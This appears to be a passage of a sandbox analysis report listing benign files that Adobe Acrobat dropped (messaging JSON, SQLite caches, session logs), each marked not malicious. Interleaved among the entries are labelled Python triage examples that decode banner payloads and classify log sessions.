                          SSDEEP:
                          MD5:5E82158872DC85E56D3A3AAC2BB422E1
                          SHA1:BEBA903A357FEDD2C2B301D91D920CD247F5EBB9
                          SHA-256:9CA3F0A115E0B19E92565846E56898AB301BDEA16C5D20FCD5CD8ECD4903D74A
                          SHA-512:939CF2039D2342C2611CE42AD84330B7167D533DC2DA9E0F6B09A86418071407D60A8500240821BED37FAEF63F2163C7D0D6E56141F60413930529626F49482A
                          Malicious:false
                          Reputation:unknown
                          Preview:{"analyticsData":{"responseGUID":"4b6eeecd-6319-4ffd-9a20-d5b2174cff49","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1742985867589,"statusCode":200,"surfaceID":"DC_Reader_RHP_Intent_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                          File Type:JSON data
                          Category:dropped
                          Size (bytes):287
                          Entropy (8bit):5.309136258020745
                          Encrypted:false
                          SSDEEP:
                          MD5:4600D826524410BB725042F3C963A6D0
                          SHA1:E365AAA1E40E3674AD1E66EE2FED0CC9C79D9327
                          SHA-256:26B40489AAD4F86DD293CF7EFDC62EA91E9BD81F48733F17DB7C47C4323D0CC3
                          SHA-512:5483F3B9CFF8A5602C67966194E98805593DFF99C0FB905BBF6B63BF60529341668CC2379DCB43D0B08477916CFFE3C15D0CE5A20C0AA785BA589AE0EBA7078F
                          Malicious:false
                          Reputation:unknown
                          Preview:{"analyticsData":{"responseGUID":"4b6eeecd-6319-4ffd-9a20-d5b2174cff49","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1742985867589,"statusCode":200,"surfaceID":"DC_Reader_RHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                          File Type:JSON data
                          Category:dropped
                          Size (bytes):2028
                          Entropy (8bit):5.8407940743715345
                          Encrypted:false
                          SSDEEP:
                          MD5:A7E65868753B0FBE33396A82A15FC269
                          SHA1:2E9D21D7E7BDD37E168DB5B2A0FBE937A6FFEFC6
                          SHA-256:CE09951185EC44C6F990CE9BE93449285226B044CC0EC14B356CE42C698FAA02
                          SHA-512:B217EBFB7624B27828AA50F1800C337907ADCC3D88171B6E8FB874BF15A7BB9158B20A8B735F74676757E2FD561BC01B4AF1CD9F9A832C28D308F7DD79044970
                          Malicious:false
                          Reputation:unknown
                          Preview:{"analyticsData":{"responseGUID":"4b6eeecd-6319-4ffd-9a20-d5b2174cff49","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1742985867589,"statusCode":200,"surfaceID":"DC_Reader_Sign_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Sign_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"102656_316349ActionBlock_0","campaignId":102656,"containerId":"1","controlGroupId":"","treatmentId":"339c0ba6-2e61-4622-82f6-f07787d206b8","variationId":"316349"},"containerId":1,"containerLabel":"JSON for DC_Reader_Sign_LHP_Banner","content":{"data":"eyJkYXRhIjp7ImxocFYyQnlQYXRoIjp7Iml0ZW0iOnsiX3BhdGgiOiIvY29udGVudC9kYW0vYWNyb2JhdGRlc2t0b3AvZ3Jvd3RoL3JlYWRlci9lbi11cy9saHAtYmFubmVyL3YyL3NpZ24iLCJfdmFyaWF0aW9uIjoicmdzMDM2MS0wIiwidGl0bGUiOm51bGwsImRlc2NyaXB0aW9uIjoiRWFzaWx5IGZpbGwgYW5kIHNpZ24gUERGcy4iLCJjdGFMYWJlbCI6bnVsbCwiY3RhQmVoYXZpb3IiOm51bGwsImN0YVVybCI6bnVsbCwiY3RhVXJsVHlwZSI6bnVsbCwidHJhY2tpbmdJZCI6bnVsbCwiX21ldGF
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                          File Type:JSON data
                          Category:dropped
                          Size (bytes):286
                          Entropy (8bit):5.284602013188922
                          Encrypted:false
                          SSDEEP:
                          MD5:BE298150650D52F5A70406A28558A3FB
                          SHA1:60C56992C9D445BEA14478A8EA33EF22978E0AA8
                          SHA-256:87449562A3145086F783B9BFAF94B84B7AAE82491A00E776C5D7E1F8A060F582
                          SHA-512:D527FC41839C634DDDC67BCB11ACF45B1C39450A016EF16A7A3E13D4DB614B178B30E776169817F241F06FBE952B8595800B81AC6D9044B5614D5B553F62C8CA
                          Malicious:false
                          Reputation:unknown
                          Preview:{"analyticsData":{"responseGUID":"4b6eeecd-6319-4ffd-9a20-d5b2174cff49","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1742985867589,"statusCode":200,"surfaceID":"DC_Reader_Upsell_Cards","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                          File Type:JSON data
                          Category:dropped
                          Size (bytes):282
                          Entropy (8bit):5.296656115717452
                          Encrypted:false
                          SSDEEP:
                          MD5:C10C84377CAA459A3A17849C13E5688E
                          SHA1:BE78B5B55AC3A4D39ABA6EEE651D457D039558A4
                          SHA-256:9CEF3D54E9974E8291D12CE36842C5FEED67CFF671A95D5182E8F4B9E7798DAD
                          SHA-512:BD7F7B7F0D8751BF699F275480BB01C25493AF62433439B7D46443B8949F008B730090230DF63A468E747EF4B71F846CA7BB22C1CAB9C5EE8410362328B2E192
                          Malicious:false
                          Reputation:unknown
                          Preview:{"analyticsData":{"responseGUID":"4b6eeecd-6319-4ffd-9a20-d5b2174cff49","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1742985867589,"statusCode":200,"surfaceID":"Edit_InApp_Aug2020","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):4
                          Entropy (8bit):0.8112781244591328
                          Encrypted:false
                          SSDEEP:
                          MD5:DC84B0D741E5BEAE8070013ADDCC8C28
                          SHA1:802F4A6A20CBF157AAF6C4E07E4301578D5936A2
                          SHA-256:81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06
                          SHA-512:65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71
                          Malicious:false
                          Reputation:unknown
                          Preview:....
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                          File Type:JSON data
                          Category:dropped
                          Size (bytes):2815
                          Entropy (8bit):5.1316187053571545
                          Encrypted:false
                          SSDEEP:
                          MD5:4E8BBF1FBFA9EAE69059523C981677A4
                          SHA1:E43C3AF6750E3D3A0F1B75E2B8D737F09FB32D96
                          SHA-256:B23335C102DE069046982EF0DC46A630DAD1C343094F814ADF364A740E89B0C1
                          SHA-512:FE5852DC9BD657F3298A8802FA52E609C72FC5DE456AD2EC257C3A0DC9E0BA52E477C4E7C972E8E76CAD8EEADA6446E933F7E376AB6D791E6B2731B883512834
                          Malicious:false
                          Reputation:unknown
                          Preview:{"all":[{"id":"DC_Reader_Disc_LHP_Banner","info":{"dg":"cde9c474b06b8e9f4448bc9838840a80","sid":"DC_Reader_Disc_LHP_Banner"},"mimeType":"file","size":289,"ts":1742807037000},{"id":"DC_Reader_Sign_LHP_Banner","info":{"dg":"206e234e5178a0a3d78c017055ec5725","sid":"DC_Reader_Sign_LHP_Banner"},"mimeType":"file","size":2028,"ts":1742807037000},{"id":"DC_Reader_Convert_LHP_Banner","info":{"dg":"b3ba8f099ebcd091efcb3e2119657f66","sid":"DC_Reader_Convert_LHP_Banner"},"mimeType":"file","size":2129,"ts":1742807037000},{"id":"DC_Reader_Edit_LHP_Banner","info":{"dg":"233a12e58cca7be654a699d0752b9692","sid":"DC_Reader_Edit_LHP_Banner"},"mimeType":"file","size":2080,"ts":1742807037000},{"id":"DC_Reader_Home_LHP_Trial_Banner","info":{"dg":"2359382c9abf28365bc6664db9a8105e","sid":"DC_Reader_Home_LHP_Trial_Banner"},"mimeType":"file","size":295,"ts":1742807037000},{"id":"DC_Reader_Disc_LHP_Retention","info":{"dg":"a8af7503709db3ba97865ac7afcc4ab6","sid":"DC_Reader_Disc_LHP_Retention"},"mimeType":"file",
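The JSON files above are all written by Acrobat.exe and carry the same responseGUID/sophiaUUID envelope, i.e. they are Adobe "Sophia" in-app messaging responses cached per surface, plus the manifest (the "all" list) that indexes them by surface id and size. Only three surfaces (Convert, Edit, Sign LHP banners) have a non-empty containerMap, and their content.data is base64 that the report prints truncated. The following is an added triage example, not code from the report or from Adobe: it decodes a possibly truncated base64 payload without guessing padding, pulls out the CMS _path and ctaUrl values plus any literal URLs, and cross-checks each dropped file's size against the manifest. MANIFEST keeps only the five manifest entries whose size is visible on the page, the per-surface JSON is rebuilt as dicts because the page prints it cut off, CONVERT_B64_PREFIX is the truncated base64 exactly as printed for DC_Reader_Convert_LHP_Banner, and the third DROPPED record is an invented tamper case that does not appear in the report.

```python
"""Triage Acrobat 'Sophia' surface JSON against its cache manifest.

Added example, not part of the Joe Sandbox report. Sample data is constructed
from the previews on the page (see the lead-in for what is truncated/invented).
"""
import base64
import re

# Constructed from the manifest preview: only entries whose "size" is visible.
MANIFEST = {"all": [
    {"id": "DC_Reader_Disc_LHP_Banner", "size": 289, "ts": 1742807037000},
    {"id": "DC_Reader_Sign_LHP_Banner", "size": 2028, "ts": 1742807037000},
    {"id": "DC_Reader_Convert_LHP_Banner", "size": 2129, "ts": 1742807037000},
    {"id": "DC_Reader_Edit_LHP_Banner", "size": 2080, "ts": 1742807037000},
    {"id": "DC_Reader_Home_LHP_Trial_Banner", "size": 295, "ts": 1742807037000},
]}

# Truncated base64 exactly as printed in the report (length is not a multiple of 4).
CONVERT_B64_PREFIX = (
    "eyJkYXRhIjp7ImxocFYyQnlQYXRoIjp7Iml0ZW0iOnsiX3BhdGgiOiIvY29udGVudC9kYW0vYWNyb2Jh"
    "dGRlc2t0b3AvZ3Jvd3RoL3JlYWRlci9lbi11cy9saHAtYmFubmVyL3YyL2NvbnZlcnQiLCJfdmFyaWF0"
    "aW9uIjoicmdzMDM2MS0wIiwidGl0bGUiOm51bGwsImRlc2NyaXB0aW9uIjoiRXhwb3J0IFBERnMgdG8g"
    "TWljcm9zb2Z0IFdvcmQgYW5kIEV4Y2VsLiIsImN0YUxhYmVsIjpudWxsLCJjdGFCZWhhdmlvciI6bnVs"
    "bCwiY3RhVXJsIjpudWxsLCJjdGFVcmxUeXBlIjpudWxsLC"
)

# (size from the report, JSON rebuilt as a dict). The last record is an
# invented tamper case (wrong size for its surface id) and is not on the page.
DROPPED = [
    {"size": 289, "json": {"surfaceID": "DC_Reader_Disc_LHP_Banner", "statusCode": 200,
                           "surfaceObj": {"containerMap": {}}}},
    {"size": 2129, "json": {"surfaceID": "DC_Reader_Convert_LHP_Banner", "statusCode": 200,
                            "surfaceObj": {"containerMap": {"1": {
                                "containerLabel": "JSON for DC_Reader_Convert_LHP_Banner",
                                "content": {"data": CONVERT_B64_PREFIX}}}}}},
    {"size": 4096, "json": {"surfaceID": "DC_Reader_Edit_LHP_Banner", "statusCode": 200,
                            "surfaceObj": {"containerMap": {}}}},
]

URL_RE = re.compile(r"https?://[^\s\"'<>]+")


def decode_b64_prefix(s: str) -> str:
    """Decode base64 that may be cut off mid-stream: drop the incomplete trailing
    quartet instead of inventing padding, then decode the bytes as UTF-8."""
    s = re.sub(r"\s+", "", s)
    s = s[: len(s) - len(s) % 4]
    return base64.b64decode(s, validate=True).decode("utf-8", errors="replace")


def payloads(record_json: dict) -> dict:
    """Return {containerId: decoded content.data} for every container."""
    out = {}
    for cid, c in record_json.get("surfaceObj", {}).get("containerMap", {}).items():
        data = c.get("content", {}).get("data")
        if isinstance(data, str):
            out[cid] = decode_b64_prefix(data)
    return out


def triage(record: dict, manifest: dict) -> dict:
    """Cross-check one dropped surface file against the manifest and summarise
    what its decoded payload points at (CMS path, click-through URL, raw URLs)."""
    sid = record["json"].get("surfaceID")
    entry = next((m for m in manifest["all"] if m["id"] == sid), None)
    if entry is None:
        manifest_status = "not-in-manifest"
    elif entry["size"] != record["size"]:
        manifest_status = "size-mismatch"
    else:
        manifest_status = "ok"
    decoded = payloads(record["json"])
    text = "\n".join(decoded.values())
    urls = sorted(set(URL_RE.findall(text)))
    cta = re.findall(r'"ctaUrl":(null|"[^"]*")', text)
    paths = re.findall(r'"_path":"([^"]*)"', text)
    return {"surfaceID": sid, "manifest": manifest_status, "containers": len(decoded),
            "paths": paths, "cta": cta, "urls": urls,
            # anything that is not a size-consistent, URL-free Adobe banner gets a human look
            "review": manifest_status != "ok" or bool(urls) or any(c != "null" for c in cta)}


def triage_all(records=DROPPED, manifest=MANIFEST) -> list:
    return [triage(r, manifest) for r in records]


if __name__ == "__main__":
    for row in triage_all():
        print(row)
```

The size check is deliberately weak evidence on its own (a file rewritten to the same length passes it); the "dg" digests in the manifest are not the MD5s the report lists for the files, so they are not used here. The decoded Convert payload is plain Adobe CMS banner metadata with every ctaUrl null, which is what "Malicious: false" on these entries should mean in practice.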
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                          File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 19, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 19
                          Category:dropped
                          Size (bytes):12288
                          Entropy (8bit):0.9880972728348022
                          Encrypted:false
                          SSDEEP:
                          MD5:54545DB65F063388A47E7B3BBD887C8C
                          SHA1:7AEF1503535801A21873F5C21DAB56D86F56B082
                          SHA-256:EBBB201F0FABAEE8DE1C945831C82E732F80110D3761695DBD8614C1A41BC992
                          SHA-512:1DC7818738C385C57F5CD99F0FAF2A4B37AAF7F1D4DF4875F1890E1973F6BA688FF6C93995EC5A43ABC29FF58093E68E23C8510E1FC1DE0B12D83939E88C57EA
                          Malicious:false
                          Reputation:unknown
                          Preview:SQLite format 3......@ ..........................................................................c.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                          File Type:SQLite Rollback Journal
                          Category:dropped
                          Size (bytes):8720
                          Entropy (8bit):1.3447457036948638
                          Encrypted:false
                          SSDEEP:
                          MD5:8F6F28434CDAB4590BD5194A998F5353
                          SHA1:D03084A3BE004A9E78914B40CF450CE15F67289C
                          SHA-256:CBD4753983AED3D1CFCD2CF07768F48C4AF99130BB756232D7277208645321CB
                          SHA-512:B61CD2F41D2AFA913FB3EF980BBEC5714EF51778BF3AE8461D7ABCC52ACE29A2C6E005F145E1E997F46BC80CB1D6E8C360CBF3D13995CDD5CF73C962C5248402
                          Malicious:false
                          Reputation:unknown
                          Preview:.... .c......C........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................j...#..#.#.#.#.#.#.#.#.7.7........................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):246
                          Entropy (8bit):3.51161293806784
                          Encrypted:false
                          SSDEEP:
                          MD5:3FD588F0BBFB66B0EC34C2BF28ADA6DA
                          SHA1:8B9A455E73290BDF03A9B1DACADAA8246C0E39C7
                          SHA-256:F37F2BF774ECC94F12C6BC2C36A0F35BBFCF28F2756341B9975B3B1C306B19A2
                          SHA-512:6133C3B757AF8D7C782444B6CF9AC2BE787CBA24ABB07A357ED189613AF9929509AF51318E145C890698E7316C08E04521B71B1A787396128F7986C455CC18EF
                          Malicious:false
                          Reputation:unknown
                          Preview (decoded from UTF-16LE):Error 2711.The specified Feature name ('ARM') not found in Feature table.
                          === Logging stopped: 24/03/2025  05:04:00 ===
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                          File Type:ASCII text, with very long lines (393)
                          Category:dropped
                          Size (bytes):16525
                          Entropy (8bit):5.353642815103214
                          Encrypted:false
                          SSDEEP:
                          MD5:91F06491552FC977E9E8AF47786EE7C1
                          SHA1:8FEB27904897FFCC2BE1A985D479D7F75F11CEFC
                          SHA-256:06582F9F48220653B0CB355A53A9B145DA049C536D00095C57FCB3E941BA90BB
                          SHA-512:A63E6E0D25B88EBB6602885AB8E91167D37267B24516A11F7492F48876D3DDCAE44FFC386E146F3CF6EB4FA6AF251602143F254687B17FCFE6F00783095C5082
                          Malicious:false
                          Reputation:unknown
                          Preview:SessionID=ec4bacf2-5410-40d4-850b-5ac338f864f3.1696585143072 Timestamp=2023-10-06T11:39:03:072+0200 ThreadID=6404 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------".SessionID=ec4bacf2-5410-40d4-850b-5ac338f864f3.1696585143072 Timestamp=2023-10-06T11:39:03:072+0200 ThreadID=6404 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found".SessionID=ec4bacf2-5410-40d4-850b-5ac338f864f3.1696585143072 Timestamp=2023-10-06T11:39:03:072+0200 ThreadID=6404 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!".SessionID=ec4bacf2-5410-40d4-850b-5ac338f864f3.1696585143072 Timestamp=2023-10-06T11:39:03:073+0200 ThreadID=6404 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1".SessionID=ec4bacf2-5410-40d4-850b-5ac338f864f3.1696585143072 Timestamp=2023-10-06T11:39:03:073+0200 ThreadID=6404 Component=ngl-lib_NglAppLib Description="SetConfig:
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                          File Type:ASCII text, with very long lines (393), with CRLF line terminators
                          Category:dropped
                          Size (bytes):15114
                          Entropy (8bit):5.347349474003338
                          Encrypted:false
                          SSDEEP:
                          MD5:49CD1022AE33C85B42F1648AFA48F7ED
                          SHA1:C62F990E67D7B2C6FA84E8C20832C7D0069F197E
                          SHA-256:8D06B76D793F0A889302F093148CA1C2D24C10D7E39DF44C31ECFB86A9B09BF4
                          SHA-512:CA5A09AA6680A4F6F541B1F9CE116D169470F51E9AC547220DF004F63BBA073BEB1F18CF96E6C2B38597B4707E4452FEF62872104CA96B089C2112832FDC1391
                          Malicious:false
                          Reputation:unknown
                          Preview:SessionID=0af53a08-addb-4451-b4ca-be476736d58b.1742807035099 Timestamp=2025-03-24T05:03:55:099-0400 ThreadID=7144 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------"..SessionID=0af53a08-addb-4451-b4ca-be476736d58b.1742807035099 Timestamp=2025-03-24T05:03:55:102-0400 ThreadID=7144 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found"..SessionID=0af53a08-addb-4451-b4ca-be476736d58b.1742807035099 Timestamp=2025-03-24T05:03:55:102-0400 ThreadID=7144 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!"..SessionID=0af53a08-addb-4451-b4ca-be476736d58b.1742807035099 Timestamp=2025-03-24T05:03:55:102-0400 ThreadID=7144 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1"..SessionID=0af53a08-addb-4451-b4ca-be476736d58b.1742807035099 Timestamp=2025-03-24T05:03:55:102-0400 ThreadID=7144 Component=ngl-lib_NglAppLib Description="SetConf
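The two ngl-lib session logs above have the same line format but belong to different sessions: the first (SessionID suffix 1696585143072, 2023-10-06) predates the analysis and is part of the VM image, the second (suffix 1742807035099, 2025-03-24T05:03:55-0400) is the session this run produced. The SessionID suffix is the session start as a Unix epoch in milliseconds, and it should agree with the first Timestamp of that session. The following added example, not part of the report or of Adobe's tooling, parses these lines, normalises NGL's unusual "HH:MM:SS:mmm+HHMM" timestamp, and labels each session as baseline or analysis-run relative to an assumed run start. SAMPLE_LOG is reconstructed from the two previews (which print the LF/CRLF separators as dots), and RUN_START is an assumed analysis start time, not a value taken from the report.

```python
"""Parse Acrobat ngl-lib session-log lines and separate sessions created during
this sandbox run from sessions already present in the VM image.

Added example, not part of the Joe Sandbox report. SAMPLE_LOG is reconstructed
from the report previews; RUN_START is an assumption.
"""
import re
from datetime import datetime, timezone

SAMPLE_LOG = """\
SessionID=ec4bacf2-5410-40d4-850b-5ac338f864f3.1696585143072 Timestamp=2023-10-06T11:39:03:072+0200 ThreadID=6404 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------"
SessionID=ec4bacf2-5410-40d4-850b-5ac338f864f3.1696585143072 Timestamp=2023-10-06T11:39:03:072+0200 ThreadID=6404 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found"
SessionID=0af53a08-addb-4451-b4ca-be476736d58b.1742807035099 Timestamp=2025-03-24T05:03:55:099-0400 ThreadID=7144 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------"
SessionID=0af53a08-addb-4451-b4ca-be476736d58b.1742807035099 Timestamp=2025-03-24T05:03:55:102-0400 ThreadID=7144 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!"
"""

LINE_RE = re.compile(
    r'^SessionID=(?P<sid>[0-9a-f-]{36})\.(?P<epoch_ms>\d{13}) '
    r'Timestamp=(?P<ts>\S+) ThreadID=(?P<tid>\d+) '
    r'Component=(?P<comp>\S+) Description="(?P<desc>.*)"$'
)

# Assumed start of the sandbox run (UTC); anything that began before it is baseline.
RUN_START = datetime(2025, 3, 24, 9, 0, tzinfo=timezone.utc)


def parse_ngl_timestamp(ts: str) -> datetime:
    """NGL writes 'YYYY-MM-DDTHH:MM:SS:mmm+HHMM' with a colon before the millis,
    which strptime rejects; rewrite it as '.mmm' and parse with %f%z."""
    m = re.fullmatch(r"(\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2}):(\d{3})([+-]\d{4})", ts)
    if not m:
        raise ValueError(f"unrecognised NGL timestamp: {ts!r}")
    return datetime.strptime(f"{m[1]}.{m[2]}{m[3]}", "%Y-%m-%dT%H:%M:%S.%f%z")


def parse_ngl_log(text: str) -> list:
    """Parse every well-formed line; skip truncated or foreign lines so a
    damaged log still yields the sessions it does contain."""
    rows = []
    for line in text.splitlines():
        m = LINE_RE.match(line.rstrip("\r"))
        if not m:
            continue
        rows.append({
            "session": m["sid"],
            "session_start": datetime.fromtimestamp(int(m["epoch_ms"]) / 1000, tz=timezone.utc),
            "when": parse_ngl_timestamp(m["ts"]).astimezone(timezone.utc),
            "thread": int(m["tid"]),
            "component": m["comp"],
            "description": m["desc"],
        })
    return rows


def classify_sessions(rows: list, run_start: datetime) -> dict:
    """Group rows by session; label each 'analysis-run' if it started at or after
    run_start, else 'baseline'. Also verify the SessionID epoch agrees with the
    earliest Timestamp of the session (within one second)."""
    out = {}
    for r in rows:
        s = out.setdefault(r["session"], {"start": r["session_start"], "lines": 0,
                                          "first_line_utc": r["when"]})
        s["lines"] += 1
        s["first_line_utc"] = min(s["first_line_utc"], r["when"])
    for s in out.values():
        s["label"] = "analysis-run" if s["start"] >= run_start else "baseline"
        s["start_matches_log"] = abs((s["start"] - s["first_line_utc"]).total_seconds()) < 1
    return out


if __name__ == "__main__":
    for sid, s in classify_sessions(parse_ngl_log(SAMPLE_LOG), RUN_START).items():
        print(sid, s["label"], s["lines"], s["start"].isoformat(), s["start_matches_log"])
```

Both sessions pass the epoch-versus-timestamp check (the 2023 log is +0200, the 2025 log is -0400, and both resolve to the same UTC instant as their SessionID suffix), so neither file shows signs of being edited; the useful outcome is simply that the 2023 session can be excluded from the behaviour attributed to the PDF.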
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                          File Type:ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):29752
                          Entropy (8bit):5.420661478962391
                          Encrypted:false
                          SSDEEP:
                          MD5:559D3AF73ECCA34EE5B6DD7420F2452D
                          SHA1:E6016CB4FBEE0CB7FE26514F8B3E6698883EFA2A
                          SHA-256:8A737F9F5179FF42D944709C0FDDCA2A62B8DF897342E7DC2439BE65771C346C
                          SHA-512:320463E7D168639FA921B34482F981436810108CE8823F4E504D685089C800C23BFC77028900B371E5B91967D467977E77ACB56DF3D57ED93FFA9471D493DE8D
                          Malicious:false
                          Reputation:unknown
                          Preview:06-10-2023 10:08:42:.---2---..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : ***************************************..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : ***************************************..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : ******** Starting new session ********..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : Starting NGL..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : Setting synchronous launch...06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 ::::: Configuring as AcrobatReader1..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : NGLAppVersion 23.6.20320.6..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : NGLAppMode NGL_INIT..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : AcroCEFPath, NGLCEFWorkflowModulePath - C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1 C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : isNGLExternalBrowserDisabled - No..06-10-2023 10:08:42:.Closing File..06-10-
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                          File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 5111142
                          Category:dropped
                          Size (bytes):1419751
                          Entropy (8bit):7.976496077007677
                          Encrypted:false
                          SSDEEP:
                          MD5:1A39CAAE4C5F8AD2A98F0756FFCBA562
                          SHA1:279F2B503A0B10E257674D31532B01EA7DE0473F
                          SHA-256:57D198C7BDB9B002B8C9C1E1CCFABFE81C00FE0A1E30A237196A7C133237AA95
                          SHA-512:73D083E92FB59C92049AF8DC31A0AA2F38755453FFB161D18A1C4244747EE88B7A850F7951FC10F842AE65F6CC8F6164231DB6261777EC5379B337CB379BEF99
                          Malicious:false
                          Reputation:unknown
                          Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                          File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 33081
                          Category:dropped
                          Size (bytes):1407294
                          Entropy (8bit):7.97605879016224
                          Encrypted:false
                          SSDEEP:
                          MD5:1D64D25345DD73F100517644279994E6
                          SHA1:DE807F82098D469302955DCBE1A963CD6E887737
                          SHA-256:0A05C4CE0C4D8527D79A3C9CEE2A8B73475F53E18544622E4656C598BC814DFC
                          SHA-512:C0A37437F84B4895A7566E278046CFD50558AD84120CA0BD2EAD2259CA7A30BD67F0BDC4C043D73257773C607259A64B6F6AE4987C8B43BB47241F3C78EB9416
                          Malicious:false
                          Reputation:unknown
